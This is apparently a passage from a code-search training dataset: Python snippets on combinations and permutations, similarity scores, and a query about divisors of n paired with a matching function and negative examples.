in set(combos(array,n-1)):\n for i in array:\n #added this to avoid duplicate combos\n if i not in c:\n # add element i to combo c\n yield frozenset({i})| c", "def Combinations(n, k):\n if int(n) != n or int(k) != k or n < k or k <= 0:\n return None\n\n if k == n:\n return [range(n)]\n elif k == 1:\n return [[ii] for ii in range(n)]\n\n combinations = Combinations(n-1, k)\n combinations_append_last = Combinations(n-1, k-1)\n for ii in range(len(combinations_append_last)):\n combination = combinations_append_last[ii]\n combination.append(n-1)\n combinations.append(combination)\n return combinations", "def combine(combination_input):\n\n output = sum([map(list, itertools.combinations(combination_input, i)) for i in range(len(combination_input) + 1)], [])\n output_final = [sorted(i) for i in output if len(i)>1]\n\n return sorted(output_final)", "def pythagoras():\r\n pl = []\r\n range_ = int(input(\r\n \"Enter the range up to which you want to find the combination of the pythagoras numbers: \"))\r\n for a in range(1, range_+1):\r\n for b in range(a, range_+1):\r\n for c in range(b, range_+1):\r\n if a**2+b**2 == c**2:\r\n pl.append([a, b, c])\r\n elif b**2+c**2 == a**2:\r\n pl.append([a, b, c])\r\n elif c**2+a**2 == b**2:\r\n pl.append([a, b, c])\r\n return pl", "def main():\n\n import sys\n sys.setrecursionlimit(10**7)\n from itertools import accumulate, combinations, permutations, product # https://docs.python.org/ja/3/library/itertools.html\n # accumulate() returns iterator! to get list: list(accumulate())\n from math import factorial, ceil, floor\n def factorize(n):\n \"\"\"return the factors of the Arg and count of each factor\n \n Args:\n n (long): number to be resolved into factors\n \n Returns:\n list of tuples: factorize(220) returns [(2, 2), (5, 1), (11, 1)]\n \"\"\"\n fct = [] # prime factor\n b, e = 2, 0 # base, exponent\n while b * b <= n:\n while n % b == 0:\n n = n // b\n e = e + 1\n if e > 0:\n fct.append((b, e))\n b, e = b + 1, 0\n if n > 1:\n fct.append((n, 1))\n return fct\n def combinations_count(n, r):\n \"\"\"Return the number of selecting r pieces of items from n kinds of items.\n \n Args:\n n (long): number\n r (long): number\n \n Raises:\n Exception: not defined when n or r is negative\n \n Returns:\n long: number\n \"\"\"\n # TODO: How should I do when n - r is negative?\n if n < 0 or r < 0:\n raise Exception('combinations_count(n, r) not defined when n or r is negative')\n if n - r < r: r = n - r\n if r < 0: return 0\n if r == 0: return 1\n if r == 1: return n\n numerator = [n - r + k + 1 for k in range(r)]\n denominator = [k + 1 for k in range(r)]\n for p in range(2,r+1):\n pivot = denominator[p - 1]\n if pivot > 1:\n offset = (n - r) % p\n for k in range(p-1,r,p):\n numerator[k - offset] /= pivot\n denominator[k] /= pivot\n result = 1\n for k in range(r):\n if numerator[k] > 1:\n result *= int(numerator[k])\n return result\n def combinations_with_replacement_count(n, r):\n \"\"\"Return the number of selecting r pieces of items from n kinds of items allowing individual elements to be repeated more than once.\n \n Args:\n n (long): number\n r (long): number\n \n Raises:\n Exception: not defined when n or r is negative\n \n Returns:\n long: number\n \"\"\"\n if n < 0 or r < 0:\n raise Exception('combinations_with_replacement_count(n, r) not defined when n or r is negative')\n elif n == 0:\n return 1\n else:\n return combinations_count(n + r - 1, r)\n from bisect import bisect_left, bisect_right\n from collections import deque, Counter, defaultdict # 
https://docs.python.org/ja/3/library/collections.html#collections.deque\n from heapq import heapify, heappop, heappush, heappushpop, heapreplace,nlargest,nsmallest # https://docs.python.org/ja/3/library/heapq.html\n from copy import deepcopy, copy # https://docs.python.org/ja/3/library/copy.html\n from operator import itemgetter\n # ex1: List.sort(key=itemgetter(1))\n # ex2: sorted(tuples, key=itemgetter(1,2))\n from functools import reduce\n def chmin(x, y):\n \"\"\"change minimum\n if x > y, x = y and return (x, True).\n convenient when solving problems of dp[i]\n \n Args:\n x (long): current minimum value\n y (long): potential minimum value\n \n Returns:\n (x, bool): (x, True) when updated, else (x, False)\n \"\"\"\n if x > y:\n x = y\n return (x, True)\n else:\n return (x, False)\n def chmax(x, y):\n \"\"\"change maximum\n if x < y, x = y and return (x, True).\n convenient when solving problems of dp[i]\n \n Args:\n x (long): current maximum value\n y (long): potential maximum value\n \n Returns:\n (x, bool): (x, True) when updated, else (x, False)\n \"\"\"\n if x < y:\n x = y\n return (x, True)\n else:\n return (x, False)\n\n from fractions import gcd # Deprecated since version 3.5: Use math.gcd() instead.\n def gcds(numbers):\n return reduce(gcd, numbers)\n def lcm(x, y):\n return (x * y) // gcd(x, y)\n def lcms(numbers):\n return reduce(lcm, numbers, 1)\n\n # first create factorial_list\n # fac_list = mod_factorial_list(n)\n INF = 10 ** 18\n MOD = 10 ** 9 + 7\n modpow = lambda a, n, p = MOD: pow(a, n, p) # Recursive function in python is slow!\n def modinv(a, p = MOD):\n # evaluate reciprocal using Fermat's little theorem:\n # a**(p-1) is identical to 1 (mod p) when a and p is coprime\n return modpow(a, p-2, p)\n def modinv_list(n, p = MOD):\n if n <= 1:\n return [0,1][:n+1]\n else:\n inv_t = [0,1]\n for i in range(2, n+1):\n inv_t += [inv_t[p % i] * (p - int(p / i)) % p]\n return inv_t\n def modfactorial_list(n, p = MOD):\n if n == 0:\n return [1]\n else:\n l = [0] * (n+1)\n tmp = 1\n for i in range(1, n+1):\n tmp = tmp * i % p\n l[i] = tmp\n return l\n def modcomb(n, k, fac_list = [], p = MOD):\n # fac_list = modfactorial_list(100)\n # print(modcomb(100, 5, modfactorial_list(100)))\n from math import factorial\n if n < 0 or k < 0 or n < k: return 0\n if n == 0 or k == 0: return 1\n if len(fac_list) <= n:\n a = factorial(n) % p\n b = factorial(k) % p\n c = factorial(n-k) % p\n else:\n a = fac_list[n]\n b = fac_list[k]\n c = fac_list[n-k]\n return (a * modpow(b, p-2, p) * modpow(c, p-2, p)) % p\n def modadd(a, b, p = MOD):\n return (a + b) % MOD\n def modsub(a, b, p = MOD):\n return (a - b) % p\n def modmul(a, b, p = MOD):\n return ((a % p) * (b % p)) % p\n def moddiv(a, b, p = MOD):\n return modmul(a, modpow(b, p-2, p))\n\n \"\"\" initialize variables and set inputs\n # initialize variables\n # to initialize list, use [0] * n\n # to initialize two dimentional array, use [[0] * N for _ in range(N)]\n # set inputs\n # open(0).read() is a convenient method:\n # ex) n, m, *x = map(int, open(0).read().split())\n # min(x[::2]) - max(x[1::2])\n # ex2) *x, = map(int, open(0).read().split())\n # don't forget to add comma after *x if only one variable is used\n # preprocessing\n # transpose = [x for x in zip(*data)]\n # ex) [[1, 2, 3], [4, 5, 6], [7, 8, 9]] => [(1, 4, 7), (2, 5, 8), (3, 6, 9)]\n # flat = [flatten for inner in data for flatten in inner]\n # ex) [[1, 2, 3], [4, 5, 6], [7, 8, 9]] => [1, 2, 3, 4, 5, 6, 7, 8, 9]\n # calculate and output\n # output pattern\n # ex1) print(*l) => 
when l = [2, 5, 6], printed 2 5 6\n \"\"\"\n\n # functions used\n r = lambda: sys.stdin.readline().strip()\n r_int = lambda: int(r())\n R = lambda: list(map(int, r().split()))\n Rfloat = lambda: list(map(float, r().split()))\n Rtuple = lambda: tuple(map(int, r().split()))\n Rmap = lambda: map(int, r().split())\n\n \"\"\" how to treat input\n # single int: int(r())\n # single string: r()\n # single float: float(r())\n # line int: R()\n # line string: r().split()\n # line (str, int, int): [j if i == 0 else int(j) for i, j in enumerate(r().split())]\n # lines int: [R() for _ in range(n)]\n \"\"\"\n\n # main\n N, Q = R()\n STX = [R() for _ in range(N)]\n STX.sort(key=itemgetter(2))\n\n D = [int(r()) for _ in range(Q)]\n Stopped = [-1] * Q\n ans = [-1] * Q\n\n for s, t, x in STX:\n l = bisect_left(D, s-x)\n r = bisect_left(D,t-x)\n a = l\n while a < r:\n if Stopped[a] == -1:\n ans[a] = x\n Stopped[a] = r\n a += 1\n else:\n a = Stopped[a]\n\n for i in ans:\n print(i)\n\n \"\"\"memo: how to use defaultdict of list\n # initialize\n Dic = defaultdict(list)\n # append / extend\n Dic[x].append(y)\n # for\n for k, v in Dic.items():\n \"\"\"", "def generate_repeats(min_size, max_size):\n generated_repeats = []\n alphabet = ['A', 'C', 'G', 'T']\n expanded_set = set()\n repeat_set = set()\n for i in range(min_size, max_size+1):\n for combination in product(alphabet, repeat=i):\n repeat = ''.join(combination)\n repeat_revcomp = rev_comp(repeat)\n expanded = expand_repeat(repeat, max_size)\n if expanded in expanded_set:\n continue\n else:\n repeat_cycles = get_cycles(repeat)\n for cycle in repeat_cycles:\n strand = '+'\n string = expand_repeat(cycle, max_size)\n expanded_set.add(string)\n if cycle not in repeat_set:\n repeat_set.add(cycle)\n generated_repeats.append('\\t'.join([cycle, repeat, str(len(cycle)), strand]))\n if repeat_revcomp == repeat:\n continue\n repeat_cycles = get_cycles(repeat_revcomp)\n for cycle in repeat_cycles:\n strand = '-'\n string = expand_repeat(cycle, max_size)\n expanded_set.add(string)\n if cycle not in repeat_set:\n repeat_set.add(cycle)\n generated_repeats.append('\\t'.join([cycle, repeat, str(len(cycle)), strand]))\n return generated_repeats", "def letters_generator():\n def multiletters(seq):\n for n in itertools.count(1):\n for s in itertools.product(seq, repeat=n):\n yield \"\".join(s)\n letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n return multiletters(letters)", "def combinations(n) -> float:\r\n c = math.factorial(n) / (math.factorial(2) * math.factorial(n - 2))\r\n return c", "def myCombinations(iterable, r):\n for perm in itertools.permutations(iterable, r):\n if sorted(perm) == list(perm):\n yield perm", "def r_combinations(n,r):\n return r_permutations(n,r) / math.factorial(r)", "def create_combinations(rnd_sol_1, start_id):\n\n store_all_combinations = []\n rnd_sol_1 = rnd_sol_1[1:]\n route_index = range(len(rnd_sol_1)-1)\n list_of_n = list(combinations(route_index, 2))\n\n for swap1, swap2 in list_of_n:\n x_swap = rnd_sol_1[:]\n x_swap[swap1], x_swap[swap2] = x_swap[swap2], x_swap[swap1]\n store_all_combinations.append([start_id] + x_swap)\n \n return store_all_combinations", "def find_words(text):\n print \"finding combinations\"\n length = len(text)\n n = length - 1\n num_combos = 2 ** (length - 1)\n\n bins = []\n for i in range(num_combos):\n num = bin(i).rsplit('b', 1)[1]\n num_str = num.zfill(n)\n bins.append(num_str)\n\n total_combos = []\n for binary_num in bins:\n combo = []\n for i in range(n):\n if binary_num[i] == '1':\n combo.append(text[i])\n 
combo.append(',')\n else:\n combo.append(text[i])\n\n combo.append(text[-1])\n combo = ''.join(combo)\n combo = combo.split(',')\n total_combos.append(combo)\n\n return total_combos", "def lists_combinations(list_1, list_2):\n return [x[0] + ' ' + x[1] for x in itertools.product(list_1, list_2)]", "def _get_argument_combinations(arguments):\n arg_names = sorted(arguments)\n combinations = itertools.product(*(arguments[arg] for arg in arg_names))\n combinations = [dict(zip(arg_names, arg_values)) for arg_values in combinations]\n return combinations", "def letterCombinations(self, digits: str) -> [str]:\n return Combinations(digits).ans", "def linear_combination(n):\n weighs = (1, 3, 9, 27)\n\n for factors in factors_set():\n sum = 0\n for i in range(len(factors)):\n sum += factors[i] * weighs[i]\n if sum == n:\n return factors", "def age_combinator(arbitrary_age):\n age_combination = 0\n for age in arbitrary_age:\n str_age = str(age)\n for a in str_age:\n age_combination += int(a)\n return age_combination", "def equipment_combinations(weapons, armor, rings):\n weapon_choices = item_combinations(weapons, range(1, 2))\n armor_choices = item_combinations(armor, range(2))\n ring_choices = item_combinations(rings, range(3))\n complete_choices = itertools.product(weapon_choices, armor_choices, ring_choices)\n return complete_choices", "def indicated_combinations(n, k):\n # - This singleton list is mutated and yielded, in order not to waste too\n # much memory.\n # - * is safe as integers are immutable\n # - I'm using integers so it's easier to skim when debugging\n indicator = [0] * n\n for combination in combinations(range(n), k):\n for i in combination:\n indicator[i] = 1\n yield indicator\n for i in combination:\n indicator[i] = 0", "def pair_combos(iterable):\n pairs = set()\n for a in iterable:\n for b in iterable:\n pairs.add(a + b)\n return list(pairs)", "def comb(set, n):\n if len(set) < n:\n raise Exception(\"Not enough elements\")\n elif len(set) == n:\n yield set\n else:\n setLen = len(set)\n iters = [rangeIter(setLen - n + 1)]\n values = [0] * n\n values[0] = iters[0].next()\n level = 1\n while True:\n # Fill array of iterators back up\n while level < n:\n iters.append(rangeIter(values[level - 1] + 1,\n setLen - n + level + 1))\n values[level]=iters[level].next()\n level += 1\n subset = [set[i] for i in values]\n yield subset\n while True:\n try:\n values[level - 1] = iters[level - 1].next()\n break\n except StopIteration:\n iters.pop()\n level -= 1\n if level == 0:\n # Top-level iterator is done, so we are too\n raise StopIteration", "def combinations(sequence, length, NULL=object()):\r\n if length <= 0:\r\n combos = [NULL]\r\n else:\r\n combos = []\r\n for i, item in enumerate(sequence, 1):\r\n rem_items = sequence[i:]\r\n rem_combos = combinations(rem_items, length-1)\r\n combos.extend(item if combo is NULL else [item, combo]\r\n for combo in rem_combos)\r\n return combos", "def generate_option_combos(self):\n available_options = list()\n for option in self.options:\n # generate a list of dicts for every value of the option\n tmp = list()\n for value in option.values:\n tmp.append({option.name: value})\n\n available_options.append(tmp)\n\n # generate a list of tuples for each product option combination\n option_combos = list(itertools.product(*available_options))\n\n return option_combos", "def triplets():\n for a in xrange(1, 1000):\n for b in xrange(a, 1000):\n c = 1000 - (a + b)\n if a**2 + b**2 == c**2:\n return a, b, c", "def digit_permutations(n):\n if n != 0:\n return 
set([int(''.join(p)) for p in permutations(str(n)) if p[0] != '0'])\n else:\n return {0}", "def get_all_comb(array, r=None):\n if r is None:\n r = len(array)\n return [_ for i in range(1, r + 1) for _ in itertools.combinations(array, i)]", "def get_perms(n):\n \n from itertools import permutations\n bases = 'CATGN'\n return [''.join(perm) for perm in permutations(bases, n)]", "def iter_combos(include_unknown=False):\n if include_unknown:\n return _combos\n else:\n return _combos[:-7]", "def check1800(s):\n num_translation = str.maketrans(\n 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', '22233344455566677778889999')\n nums_dict = defaultdict(list)\n for word in WORDS:\n nums_dict[word.translate(num_translation)].append(word)\n\n number = s[6:].replace('-', '').translate(num_translation)\n\n # we take the cartesian product of all the options for the first word and all the options for the second.\n\n # case 1, first word is 3 letter & second is 4 letter\n possibilities1 = {'1-800-{}-{}'.format(*poss) for poss in it.product(\n nums_dict[number[:3]], nums_dict[number[3:]])}\n\n # case 2, first word is 4 letter & second is 3 letter\n possibilities2 = {'1-800-{}-{}'.format(*poss) for poss in it.product(\n nums_dict[number[:4]], nums_dict[number[4:]])}\n\n return possibilities1.union(possibilities2)", "def get_chunk_combination(indiv_1, indiv_2, pair_1, pair_2):\t\r\n\tif check_fixed(indiv_1):\r\n\t\treturn [[indiv_1+indiv_2, indiv_1+indiv_2]] if check_fixed(indiv_2) else [[indiv_1+pair_2[0], indiv_1+pair_2[1]]]\r\n\telse:\r\n\t\treturn [[pair_1[0]+indiv_2, pair_1[1]+indiv_2]] if check_fixed(indiv_2) else [[pair_1[0]+pair_2[0], pair_1[0]+pair_2[1]], [pair_1[1]+pair_2[0], pair_1[1]+pair_2[1]]]\r\n\treturn res", "def split_candy(case):\n\n s_best_sum = 0\n\n# print case\n if len(case) <= 1:\n return \"NO\"\n\n # annotate values to protect against duplicates\n annotated_case = [ (i, x) for i,x in enumerate(case) ]\n# print annotated_case\n\n for length in range(1, len(annotated_case)):\n for s_pile in itertools.combinations(annotated_case, length):\n p_pile = set(annotated_case).difference(s_pile)\n\n # unzip\n s_pile = zip(*s_pile)[1]\n p_pile = zip(*p_pile)[1]\n\n# print s_pile, p_pile\n\n s_sum = reduce(lambda x, y: x+y, s_pile)\n s_xor = reduce(lambda x, y: x^y, s_pile)\n p_xor = reduce(lambda x, y: x^y, p_pile)\n\n# print s_pile, s_sum, s_xor, p_pile, p_xor\n if s_xor == p_xor:\n# print \"match\"\n s_best_sum = max(s_sum, s_best_sum)\n\n return s_best_sum or \"NO\"", "def password(A: List, N: int) -> List:\n # Allocate list members into buckets of length\n dct = {i:[] for i in range(1, max([len(a) for a in A]) + 1)}\n for a in A:\n dct[len(a)] += [a]\n\n combo = [None] * (N + 1)\n\n if dct.get(1):\n combo[1] = [tuple([1])]\n \n if dct.get(2):\n combo[2] = [tuple([2])]\n\n # Apply dynamic programming to discover the possible configurations to\n # achieve the desired pass word length. 
Use list position indexing\n for i in range(3, N + 1):\n ctr = []\n for j in range(1, (i//2) + 1):\n ctr.append([tuple(\n itertools.chain(*ea)) for ea in itertools.product(\n combo[i-j-1], combo[j])])\n\n if dct.get(i):\n combo[i] = list(itertools.chain(*ctr, [tuple([i])]))\n else:\n combo[i] = list(itertools.chain(*ctr))\n\n # For all configurations that are applicable to a given password length,\n # generate all password outputs through a product operation between all\n # members\n tracker = {}\n output = []\n for cmb in set(combo[-1]):\n sig = set([ea for ea in itertools.permutations(cmb)])\n\n for sg in sig:\n if tracker.get(sg):\n continue\n\n tracker[sg] = 1\n output += [\n '_'.join(x) for x in itertools.product(*[dct[s] for s in sg])]\n\n return output", "def tc_gen(n):\r\n comb = (list(tuple) for tuple in itertools.product([True,False], repeat=n))\r\n return list(comb)", "def powerset(n):\n # chain r-combinations generator for r=0, 1,..., n\n return chain.from_iterable(combinations(range(n), r) for r in range(n+1))", "def pairs_of_factors(n):\n seq = factor(n)\n # indexes into seq\n i = set(range(len(seq)))\n # create pairs of subsets indexes into seq and their complements\n ps = [(ss, i-ss) for ss in powerset(i) if 0 in ss and ss<i]\n return frozenset(\n tuple(sorted((prod(seq[i] for i in a), prod(seq[i] for i in b))))\n for a, b in ps)", "def zero_comb(num_list):\n return {tuple(sorted(n)) for n in combinations(num_list, 3) if sum(n) == 0}", "def get_sub_combinations(maxop):\n combo = collections.defaultdict(list)\n for numops in range(maxop+1):\n if numops:\n combo[numops, 1].append((numops-1,))\n for op1 in range(numops):\n combo[numops, 2].append((op1, numops - op1 - 1))\n for op2 in range(numops - op1):\n combo[numops, 3].append((op1, op2, numops - op1 - op2 - 1))\n return combo", "def euler24():\n\n # import math\n # math.factorial(10) = 3628800, 3.6 million combinations\n # math.factorial(9) = 362880, so the first digit is '2'\n\n import time\n start = time.time()\n\n p = 10 \n limit = 1000000-1\n result = []\n\n LIST = [0,1,2,3,4,5,6,7,8,9]\n\n\n # higest digit, 10! 
permutations in total\n while p > 0:\n l = len(result)\n m, r = divmod(limit, math.factorial(p-1))\n result.append(LIST[m])\n LIST.remove(LIST[m]) # remove first element with VALUE LIST[m]\n limit -= m * math.factorial(p-1)\n p -= 1\n\n end = time.time()\n print \"Time:\" , (end-start)*1000 , \"ms\"\n \n return result", "def __get_all_combinations(self, list_of_items):\r\n return [itertools.combinations(list_of_items, index+1)\r\n for index in range(len(list_of_items))]", "def permutations(value):\n seen = {value}\n possible = calulate_total_permutations(value)\n yield value\n LOG.info(\"%s has %s possible combinations\", value, possible)\n while True:\n if len(seen) >= possible:\n break\n anagram = shuffle_str(value)\n while True:\n if anagram not in seen:\n seen.add(anagram)\n break\n anagram = shuffle_str(anagram)\n yield anagram", "def Allcombos():\n\n global allcombos\n\n allcombos = []\n\n results = product(\"ABCDEF\", repeat=4)\n\n allcombos = resulttolist(results)\n\n return AIguessing(allcombos)", "def trivial_phase(indivs):\r\n\tpool=make_pool(len(indivs[0]))\r\n\r\n\tfor i in xrange(1,len(pool)+1):\r\n\t\tall_combi=itertools.combinations(pool,i)\r\n\t\tfor t in all_combi:\r\n\t\t\tt+=t\r\n\t\t\tcandidate_couples=list(itertools.combinations(t,2))\r\n\t\t\tgeno_list=map(lambda x: mix(x[0],x[1]), candidate_couples)\r\n\t \t\tif check(indivs, geno_list):\r\n\t \t\t\treturn list(set(t)), candidate_couples\r\n\tprint \"It's impossible to execute this, something must be wrong.\"", "def triplets(a, b, c):\n a = list((set(a)))\n a.sort()\n b = list((set(b)))\n b.sort()\n c = list((set(c)))\n c.sort()\n\n ai = 0\n bi = 0\n ci = 0\n ans = 0\n\n while bi < len(b):\n # this is the useful part ofthe code: nested while loops\n while ai < len(a) and a[ai] <= b[bi]:\n ai += 1\n\n while ci < len(c) and c[ci] <= b[bi]:\n ci += 1\n\n ans += ai * ci\n bi += 1\n\n return ans", "def generate_combinations(rack,placed_tile):\n combinations_set = set()\n if placed_tile == \"\":\n for i in range(3, (len(rack)+1)):\n for x in itertools.combinations(rack, i):\n combinations_set.add(x)\n else:\n word = rack+placed_tile\n for i in range(3, (len(word)+1)):\n for x in itertools.combinations(word, i):\n if placed_tile in x:\n combinations_set.add(x)\n \n return combinations_set", "def comb(n, k):\n return perm(n,k)/factorial(k)", "def _get_possible_sense_combinations(self, taggable, tagged):\n\t\tprint(\"\\tget possible combinations...\")\n\t\t# first create a list of the already tagged senses and store for each of those one list inside that contains the one single correct sense\n\t\ttagged_sense_keys = [[(token, token.wn_sense_key)] for token in tagged]\n\t\ttaggable_possible_sense_keys = []\n\n\t\t# for each token that has to be tagged now find all possible senses and collect them\n\t\tfor token in taggable:\n\t\t\ttoken_sense_pairs = []\n\t\t\t# for each possible sense of the token add one to the list of that sense\n\t\t\tpossible_senses = self._get_possible_wn_senses_for_token(token)\n\t\t\tfor single_possible_sense in possible_senses:\n\t\t\t\ttoken_sense_pairs.append((token, single_possible_sense))\n\t\t\ttaggable_possible_sense_keys.append(token_sense_pairs)\n\n\t\tcomplete_list_of_tokens = taggable_possible_sense_keys + tagged_sense_keys\n\n\t\tprint(\"\\t\\t...building combinations\")\n\t\t# return a dot product of the lists of possible senses of all tokens\n\t\treturn list_product(*complete_list_of_tokens)", "def generate_true_combinations(data):\n true_combinations = []\n for group in data:\n for i in 
range(len(group)):\n for j in range(i, len(group)):\n true_combinations.append((group[i], group[j], 1))\n return true_combinations", "def compute_combinations(items: List[Union[List[Any], Tuple]], n: int) -> List[List[Any]]:\n return [chunks[i:i + n] for chunks in items for i in range(len(chunks) - (n - 1))]", "def combinations(*args: List[Any]) -> List[List]:\n return list([list(el) for el in list(product(*args))])", "def pathCombinations(A,compnts):\n linkOpt = []\n pSize = len(compnts)\n #Variable to keep track of number of nodes in the branch\n nNodes = 1\n\n #Find the links between each adjacent component in the path\n for i in range(pSize-1):\n rows,cols = np.where(A[compnts[i+1],:][:,compnts[i]]==1)\n if i == 0:\n cols += compnts[0]\n rows += nNodes\n elif i == pSize-2:\n rows += compnts[-1]\n cols += nNodes - len(compnts[i])\n else:\n rows += nNodes\n cols += nNodes - len(compnts[i])\n edges = zip(rows,cols)\n nNodes += len(compnts[i+1])\n linkOpt.append(edges)\n\n allPaths = [list(P) for P in itertools.product(*linkOpt)]\n return allPaths", "def get_combo(un_lit):\n\n done_lit = []\n li_count = len(un_lit)\n\n for letter in un_lit: # for each letter in the provided\n placeholder = 0\n for num in range(li_count) # for each pos in list\n if letter.index == placeholder:\n temp_lit = \n\n elif letter.index > placeholder:\n \n elif letter.index < placeholder:\n\n done_lit.append(temp_lit)\n placeholder += 1", "def power_set(A):\n\n L = list()\n for i in range(len(A) + 1):\n L.extend([set(j) for j in itertools.combinations(A, i)])\n return L\n\n raise NotImplementedError(\"Problem 4 Incomplete\")", "def get_subs(n):\n \n from itertools import product\n return [''.join(sub) for sub in product('CATGN', repeat=n)]", "def powerset(iterable):\n\n s = list(iterable)\n\n return chain.from_iterable(combinations(s, r) for r in range(2, len(s) + 1))", "def generate_permutations(numbers):\n\n permutations = list()\n temp = list()\n # Generate all possible permutations of numbers and plusses, record\n # the number of plus signs as cost.\n for i, num in enumerate(numbers):\n # Base case, append the number and cost of 0\n if i == 0:\n permutations.append((num, 0))\n else:\n # Iterate through permutations, appending new items to temp.\n # Strings can be permutated two ways: string + char,\n # string + '+' + char\n for item in permutations:\n temp.append((item[0] + num, item[1]))\n temp.append((item[0] + '+' + num, item[1] + 1))\n # Now we move temp to permutations and clear out temp.\n permutations = temp\n temp = list()\n return permutations", "def make_combinations(items):\n\n def inner(items, r):\n \"\"\"\n recursively yields partitioned remainders of original partition lists\n \"\"\"\n items = set(items)\n if not len(items):\n yield ()\n return\n first = next(iter(items))\n remainder = items.difference((first, ))\n for combination in combinations(remainder, r-1):\n first_subset = (first, ) + combination\n for partition in inner(remainder.difference(combination), r):\n yield (first_subset, ) + partition\n\n def outter(items, r):\n \"\"\"\n combines partition lists\n \"\"\"\n items = set(items)\n for i in range(len(items), -1, -r):\n if i == 0:\n for partition in inner(items, r):\n yield partition\n elif i != r:\n for combination in combinations(items, i):\n for partition in inner(items.difference(combination), r):\n yield partition + (combination, )\n\n # step through length of origin combination partitions to ensure full list\n for i in range(1, len(items)):\n gen = outter(items, i)\n for row in 
gen:\n yield row", "def get_all_possible_pairs(self, a, b):\n return itertools.product(a, b)" ]
[ "0.718348", "0.7005977", "0.6993959", "0.6917465", "0.6894283", "0.68004334", "0.67992324", "0.6771768", "0.67690665", "0.67308486", "0.6717386", "0.6692334", "0.667273", "0.66375154", "0.6628557", "0.6606142", "0.6602187", "0.65536106", "0.65413445", "0.6535008", "0.6530812", "0.64041907", "0.63964874", "0.63782644", "0.6339572", "0.63310623", "0.6321383", "0.6311408", "0.6287866", "0.62618333", "0.62327105", "0.622931", "0.62249297", "0.6197499", "0.6179319", "0.61552364", "0.61477226", "0.6147307", "0.614649", "0.61275136", "0.6089535", "0.60862756", "0.6079543", "0.6064233", "0.6055616", "0.6045676", "0.6041457", "0.6030775", "0.60284156", "0.60125893", "0.6008318", "0.59997535", "0.59943986", "0.59921587", "0.5985615", "0.5982762", "0.5968849", "0.59669524", "0.5948483", "0.59463745", "0.5915645", "0.5913698", "0.59083724", "0.5899219", "0.5857751", "0.58463544", "0.5842965", "0.5839806", "0.58260643", "0.5820989", "0.5819658", "0.5818484", "0.58144724", "0.58143413", "0.58055115", "0.5792867", "0.5792031", "0.57735527", "0.5770609", "0.57669526", "0.5761522", "0.5761139", "0.57537544", "0.57519275", "0.5750886", "0.57413024", "0.57391673", "0.5738384", "0.57332855", "0.57287335", "0.5722744", "0.57224214", "0.5707022", "0.5705601", "0.5697942", "0.56862825", "0.5675446", "0.56629074", "0.56585854", "0.5653505" ]
0.5852057
65
Provides the divisors of n
def divisori(n):
    # Collect each divisor pair (i, n // i) while scanning up to sqrt(n).
    div = set()
    for i in range(1, int(n**0.5 + 1)):
        if n % i == 0:
            div.add(n // i)
            div.add(i)
    return sorted(div)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getDivisors(n):", "def diviseur(n):\n s = 0\n for i in range (1, n):\n if n%i == 0:\n s += 1\n print(i)\n return \"Le nombre de diviseurs est\", s", "def divisior(n: int) -> list:\n j = [n]\n for d in range(n+1): #loop bis n\n d > 0", "def getNumDivisors(n):\n\n n = abs(int(n))\n\n r = 1\n i = 2\n while i <= n:\n a = 0\n while n % i == 0:\n n = n / i\n a = a + 1\n r = r * (a + 1)\n i = i + 1\n\n return r", "def d(n):\n divisors = []\n for i in range(1, n):\n if n % i == 0:\n divisors.append(i)\n return sum(divisors)", "def make_division_by(n):\n\n def division(x):\n assert type(x) == int, \"You can only use integers\"\n return x / n\n\n return division", "def make_division_by(n):\n def division(x):\n assert x != 0, 'Denominator can\\'t be zero'\n return x / n\n return division", "def make_division_by(n):\n assert type(n) in [int, float], \"n must be a number\"\n assert n != 0, \"division by zero is not allowed\"\n\n def divider(x):\n assert type(x) in [int, float], \"x must be a number\"\n return x / n\n\n return divider", "def proper_divisors(n):\n divisors = set([1])\n for i in range(2, int(ceil(sqrt(n)))+1):\n if n % i == 0:\n divisors.add(i)\n divisors.add(n/i)\n return divisors", "def d(n):\n return sum(divisors(n))", "def proper_divisors(n):\r\n numbers = []\r\n for i in xrange(1, n):\r\n if n % i == 0:\r\n numbers.append(i)\r\n \r\n return numbers", "def division_euclidienne(n1, n2):", "def divisors(n):\n dvs = []\n for i in range(1, int(math.sqrt(n)) + 1):\n if n % i == 0:\n dvs.append(i)\n j = n / i\n if j != i:\n dvs.append(j)\n\n dvs.remove(n)\n return dvs", "def sum_of_proper_divisors(n):\n\n\tpd = find_divisors(n)\n\n\treturn sum(pd)", "def num_divisors_iii(n):\n set_pf = set(n)\n n_div = 1\n for pf in set_pf:\n x = n.count(pf)\n n_div *= (1 + x)\n return n_div", "def sum_proper_divisors(n):\r\n return sum(proper_divisors(n))", "def count_proper_divisors(n):\r\n if n == 1:\r\n return 0\r\n m = int(sqrt(n))\r\n c = 1\r\n if m * m == n:\r\n c += 1\r\n m -= 1\r\n for i in xrange(2, m+1):\r\n if n % i == 0:\r\n c += 2\r\n return c", "def get_divisors(n, includeN=True):\n lower_divisors, upper_divisors = [], []\n i = 1\n while i * i <= n:\n if n % i == 0:\n lower_divisors.append(i)\n if i != n // i:\n upper_divisors.append(n//i)\n i += 1\n upper_divisors = upper_divisors[::-1]\n if not includeN:\n upper_divisors.pop()\n return lower_divisors + upper_divisors", "def num_divisors_ii(n):\n set_pf = set(n)\n n_og = 2**(len(set_pf))\n n_div = n_og\n for pf in set_pf:\n x = n.count(pf)\n n_div += n_div//2 * (x - 1)\n return n_div", "def make_division_by(n):\n def second_parameter(x):\n return round(x / n, 1)\n \n return second_parameter", "def properdivisors(n):\n propdiv = [1]\n start, step = [2, 1]\n\n # Odd numbers only have odd divisors\n if n % 2 == 1:\n start, step = [3, 2]\n\n for i in range(start, ceil(sqrt(n)), step):\n if n % i == 0:\n propdiv.extend([i, n//i])\n\n # If n is a perfect square, also add the square root.\n # Note: this does not work for VERY LARGE n.\n if sqrt(n).is_integer() and n != 1:\n propdiv.append(int(sqrt(n)))\n\n return(propdiv)", "def proper_divisors(n):\n l = [1]\n if n == 1 or n == 2:\n return l\n else:\n limit = math.floor(n/2) + 1\n for i in range(2, limit):\n if n % i == 0:\n l.append(i)\n return l", "def divide_by_fact(dividend, n):\n if n <= 0:\n \treturn dividend\n return divide_by_fact(dividend / n, n - 1)", "def num_divisors(n):\n divisors = []\n for i in range(1, int(n**0.5) + 1):\n if n % i == 0:\n divisors += {i, n //i}\n return 
